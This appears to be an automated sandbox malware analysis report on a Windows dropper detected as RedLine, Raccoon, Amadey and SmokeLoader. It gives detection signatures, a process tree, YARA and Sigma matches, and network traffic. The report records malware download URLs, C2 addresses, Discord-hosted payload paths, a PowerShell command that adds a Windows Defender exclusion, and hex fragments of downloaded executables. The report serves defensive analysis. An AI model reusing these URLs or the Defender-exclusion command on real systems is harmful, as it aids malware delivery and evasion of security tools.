Loading ...

Play interactive tourEdit tour

Windows Analysis Report 25Kf6vSBoq.exe

Overview

General Information

Sample Name:25Kf6vSBoq.exe
Analysis ID:511954
MD5:3b947ed5aabdd775b1afc31a5c4d39a0
SHA1:552aa072522f22a003cadd3bcad5e4eb981a5cbb
SHA256:8245ad87eea6a1f19f658adef8a30b9a512760d866b7075bbf205d7a54296234
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Amadey Raccoon RedLine SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Early bird code injection technique detected
Yara detected AntiVM3
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected UAC Bypass using CMSTP
DLL reload attack detected
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Sample uses process hollowing technique
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 25Kf6vSBoq.exe (PID: 2904 cmdline: 'C:\Users\user\Desktop\25Kf6vSBoq.exe' MD5: 3B947ED5AABDD775B1AFC31A5C4D39A0)
    • 25Kf6vSBoq.exe (PID: 5668 cmdline: 'C:\Users\user\Desktop\25Kf6vSBoq.exe' MD5: 3B947ED5AABDD775B1AFC31A5C4D39A0)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 6EC5.exe (PID: 6952 cmdline: C:\Users\user~1\AppData\Local\Temp\6EC5.exe MD5: 3B947ED5AABDD775B1AFC31A5C4D39A0)
          • 6EC5.exe (PID: 7072 cmdline: C:\Users\user~1\AppData\Local\Temp\6EC5.exe MD5: 3B947ED5AABDD775B1AFC31A5C4D39A0)
        • B82B.exe (PID: 1936 cmdline: C:\Users\user~1\AppData\Local\Temp\B82B.exe MD5: F57B28AEC65D4691202B9524F84CC54A)
          • AdvancedRun.exe (PID: 6864 cmdline: 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
            • AdvancedRun.exe (PID: 5420 cmdline: 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /SpecialRun 4101d8 6864 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
          • powershell.exe (PID: 4784 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 5204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • ServiceModelReg.exe (PID: 6952 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe MD5: FFF587A66B8D5A50A055B9CD6D632BEB)
        • C1B2.exe (PID: 5352 cmdline: C:\Users\user~1\AppData\Local\Temp\C1B2.exe MD5: 42758E2569239A774BECDB12698B124C)
        • CD0D.exe (PID: 5072 cmdline: C:\Users\user~1\AppData\Local\Temp\CD0D.exe MD5: 73252ACB344040DDC5D9CE78A5D3A4C2)
        • DF9C.exe (PID: 5668 cmdline: C:\Users\user~1\AppData\Local\Temp\DF9C.exe MD5: AB823DF932B3C2941A9015848EBDB97B)
        • EA8A.exe (PID: 3820 cmdline: C:\Users\user~1\AppData\Local\Temp\EA8A.exe MD5: 9FA070AF1ED2E1F07ED8C9F6EB2BDD29)
          • AdvancedRun.exe (PID: 6960 cmdline: 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • F4BC.exe (PID: 64 cmdline: C:\Users\user~1\AppData\Local\Temp\F4BC.exe MD5: 31BE6099D31BDBF1ED339EFFDC1C7064)
        • 3D1.exe (PID: 2220 cmdline: C:\Users\user~1\AppData\Local\Temp\3D1.exe MD5: C1EB42674C5E7180ADEFEC71EE8B1D60)
        • DF9C.exe (PID: 5844 cmdline: 'C:\Users\user~1\AppData\Local\Temp\DF9C.exe' MD5: AB823DF932B3C2941A9015848EBDB97B)
          • DF9C.exe (PID: 6772 cmdline: DF9C.exe MD5: AB823DF932B3C2941A9015848EBDB97B)
        • DF9C.exe (PID: 6760 cmdline: 'C:\Users\user~1\AppData\Local\Temp\DF9C.exe' MD5: AB823DF932B3C2941A9015848EBDB97B)
      • DF9C.exe (PID: 6128 cmdline: DF9C.exe MD5: AB823DF932B3C2941A9015848EBDB97B)
        • sqtvvs.exe (PID: 1404 cmdline: 'C:\Users\user~1\AppData\Local\Temp\603c0340b4\sqtvvs.exe' MD5: AB823DF932B3C2941A9015848EBDB97B)
  • irjbuft (PID: 6960 cmdline: C:\Users\user\AppData\Roaming\irjbuft MD5: 3B947ED5AABDD775B1AFC31A5C4D39A0)
    • irjbuft (PID: 7100 cmdline: C:\Users\user\AppData\Roaming\irjbuft MD5: 3B947ED5AABDD775B1AFC31A5C4D39A0)
  • irjbuft (PID: 1988 cmdline: C:\Users\user\AppData\Roaming\irjbuft MD5: 3B947ED5AABDD775B1AFC31A5C4D39A0)
    • irjbuft (PID: 4452 cmdline: C:\Users\user\AppData\Roaming\irjbuft MD5: 3B947ED5AABDD775B1AFC31A5C4D39A0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\C1B2.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x7a2f9:$x1: https://cdn.discordapp.com/attachments/
    C:\Users\user\AppData\Local\Temp\EA8A.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x20735:$x1: https://cdn.discordapp.com/attachments/
    • 0x207e9:$x1: https://cdn.discordapp.com/attachments/
    C:\Users\user\AppData\Local\Temp\B82B.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x7b593:$x1: https://cdn.discordapp.com/attachments/
    • 0x7b647:$x1: https://cdn.discordapp.com/attachments/

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000016.00000003.418065622.0000000002FC0000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000001C.00000002.462341902.0000000004791000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000027.00000000.491819153.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000F.00000002.382786562.0000000001F70000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            00000027.00000000.500851808.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 15 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              21.0.C1B2.exe.e80000.3.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
              • 0x7a2f9:$x1: https://cdn.discordapp.com/attachments/
              24.0.EA8A.exe.fa0000.3.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
              • 0x20735:$x1: https://cdn.discordapp.com/attachments/
              • 0x207e9:$x1: https://cdn.discordapp.com/attachments/
              24.0.EA8A.exe.fa0000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
              • 0x20735:$x1: https://cdn.discordapp.com/attachments/
              • 0x207e9:$x1: https://cdn.discordapp.com/attachments/
              21.2.C1B2.exe.e80000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
              • 0x7a2f9:$x1: https://cdn.discordapp.com/attachments/
              20.0.B82B.exe.850000.1.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
              • 0x7b593:$x1: https://cdn.discordapp.com/attachments/
              • 0x7b647:$x1: https://cdn.discordapp.com/attachments/
              Click to see the 26 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Suspicious Script Execution From Temp FolderShow sources
              Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\B82B.exe, ParentImage: C:\Users\user\AppData\Local\Temp\B82B.exe, ParentProcessId: 1936, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force, ProcessId: 4784
              Sigma detected: Powershell Defender ExclusionShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\B82B.exe, ParentImage: C:\Users\user\AppData\Local\Temp\B82B.exe, ParentProcessId: 1936, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force, ProcessId: 4784
              Sigma detected: Non Interactive PowerShellShow sources
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\B82B.exe, ParentImage: C:\Users\user\AppData\Local\Temp\B82B.exe, ParentProcessId: 1936, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force, ProcessId: 4784

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Yara detected Raccoon StealerShow sources
              Source: Yara matchFile source: 0000001F.00000002.570848013.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000003.458016800.0000000004870000.00000004.00000001.sdmp, type: MEMORY
              Antivirus detection for URL or domainShow sources
              Source: http://sysaheu90.top/game.exeAvira URL Cloud: Label: malware
              Source: http://toptelete.top/agrybirdsgamereptAvira URL Cloud: Label: malware
              Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exeAvira URL Cloud: Label: malware
              Source: http://hajezey1.top/Avira URL Cloud: Label: malware
              Antivirus detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exeAvira: detection malicious, Label: HEUR/AGEN.1138925
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeAvira: detection malicious, Label: HEUR/AGEN.1138925
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeReversingLabs: Detection: 45%
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeReversingLabs: Detection: 39%
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeReversingLabs: Detection: 79%
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeReversingLabs: Detection: 42%
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeReversingLabs: Detection: 56%
              Source: C:\Users\user\AppData\Roaming\ffjbuftReversingLabs: Detection: 56%
              Source: C:\Users\user\AppData\Roaming\fijbuftReversingLabs: Detection: 79%
              Source: C:\Users\user\AppData\Roaming\irjbuftReversingLabs: Detection: 45%
              Machine Learning detection for sampleShow sources
              Source: 25Kf6vSBoq.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\irjbuftJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\fijbuftJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\9C1A.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\ffjbuftJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\3D1.exeJoe Sandbox ML: detected
              Source: 16.0.irjbuft.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 29.0.DF9C.exe.400000.15.unpackAvira: Label: TR/AD.Amadey.ezxiu
              Source: 29.0.DF9C.exe.400000.5.unpackAvira: Label: TR/AD.Amadey.ezxiu
              Source: 29.0.DF9C.exe.400000.17.unpackAvira: Label: TR/AD.Amadey.ezxiu
              Source: 16.0.irjbuft.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 15.0.6EC5.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 29.0.DF9C.exe.400000.7.unpackAvira: Label: TR/AD.Amadey.ezxiu
              Source: 29.0.DF9C.exe.400000.11.unpackAvira: Label: TR/AD.Amadey.ezxiu
              Source: 16.0.irjbuft.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 15.0.6EC5.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 29.0.DF9C.exe.400000.13.unpackAvira: Label: TR/AD.Amadey.ezxiu
              Source: 15.0.6EC5.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 16.0.irjbuft.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 15.0.6EC5.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 29.0.DF9C.exe.400000.9.unpackAvira: Label: TR/AD.Amadey.ezxiu

              Exploits:

              barindex
              Yara detected UAC Bypass using CMSTPShow sources
              Source: Yara matchFile source: 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: B82B.exe PID: 1936, type: MEMORYSTR
              Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49794 version: TLS 1.0
              Source: 25Kf6vSBoq.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
              Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49773 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.7:49778 version: TLS 1.2
              Source: Binary string: C:\vojos\fuw.pdb source: CD0D.exe, 00000016.00000000.407750577.0000000000417000.00000002.00020000.sdmp
              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: DF9C.exe
              Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 0000001B.00000000.419935360.000000000040C000.00000002.00020000.sdmp
              Source: Binary string: C:\ciwomo siju28 nijohon\93-loze\2.pdb source: F4BC.exe
              Source: Binary string: C:\wucalehozojoh\setujupiwe-y.pdb source: 25Kf6vSBoq.exe, 00000001.00000000.243151680.0000000000401000.00000020.00020000.sdmp, 25Kf6vSBoq.exe, 00000002.00000000.254410960.0000000000401000.00000020.00020000.sdmp, 6EC5.exe, 0000000D.00000000.348402437.0000000000401000.00000020.00020000.sdmp, irjbuft, 0000000E.00000000.347743203.0000000000401000.00000020.00020000.sdmp, 6EC5.exe, 0000000F.00000000.367434923.0000000000401000.00000020.00020000.sdmp, irjbuft, 00000010.00000000.374293727.0000000000401000.00000020.00020000.sdmp
              Source: Binary string: wntdll.pdbUGP source: CD0D.exe, 00000016.00000002.449035922.000000006A8F1000.00000020.00020000.sdmp
              Source: Binary string: wntdll.pdb source: CD0D.exe
              Source: Binary string: `C:\ciwomo siju28 nijohon\93-loze\2.pdb` source: F4BC.exe, 0000001C.00000000.424216485.0000000000401000.00000020.00020000.sdmp
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_0041B9B2 FindFirstFileExW,

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.7:49812 -> 91.219.236.97:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49823 -> 185.215.113.45:80
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\explorer.exeDomain query: xacokuo8.top
              Source: C:\Windows\explorer.exeNetwork Connect: 216.128.137.31 80
              Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-6000.top
              Source: C:\Windows\explorer.exeDomain query: hajezey1.top
              Source: C:\Windows\explorer.exeDomain query: sysaheu90.top
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 132Host: 91.219.236.97
              Source: global trafficHTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/019cd02588367c4185228009642767b5fca228df HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
              Source: global trafficHTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/07191d3d9db3dbffa0d8f6d32b0cace6fdafa466 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:29:21 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:29:01 GMTETag: "54000-5cf820050e185"Accept-Ranges: bytesContent-Length: 344064Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 15 19 94 43 74 77 c7 43 74 77 c7 43 74 77 c7 2c 02 dc c7 6e 74 77 c7 2c 02 e9 c7 61 74 77 c7 2c 02 dd c7 3c 74 77 c7 4a 0c e4 c7 44 74 77 c7 43 74 76 c7 3c 74 77 c7 2c 02 d8 c7 42 74 77 c7 2c 02 ed c7 42 74 77 c7 2c 02 ea c7 42 74 77 c7 52 69 63 68 43 74 77 c7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 36 ca 8e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 be 03 00 00 c4 70 02 00 00 00 00 40 c3 01 00 00 10 00 00 00 d0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 74 02 00 04 00 00 31 96 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c1 03 00 50 00 00 00 00 50 73 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 73 02 3c 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 bc 03 00 00 10 00 00 00 be 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 d0 03 00 00 16 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 75 66 75 6c 61 63 e5 02 00 00 00 40 73 02 00 04 00 00 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 50 73 02 00 40 00 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 22 01 00 00 90 73 02 00 24 01 00 00 1c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:30:00 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:29:02 GMTETag: "92800-5cf820058192d"Accept-Ranges: bytesContent-Length: 600064Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 15 19 94 43 74 77 c7 43 74 77 c7 43 74 77 c7 2c 02 dc c7 6e 74 77 c7 2c 02 e9 c7 61 74 77 c7 2c 02 dd c7 3c 74 77 c7 4a 0c e4 c7 44 74 77 c7 43 74 76 c7 3c 74 77 c7 2c 02 d8 c7 42 74 77 c7 2c 02 ed c7 42 74 77 c7 2c 02 ea c7 42 74 77 c7 52 69 63 68 43 74 77 c7 00 00 00 00 00 00 00 00 50 45 00 00 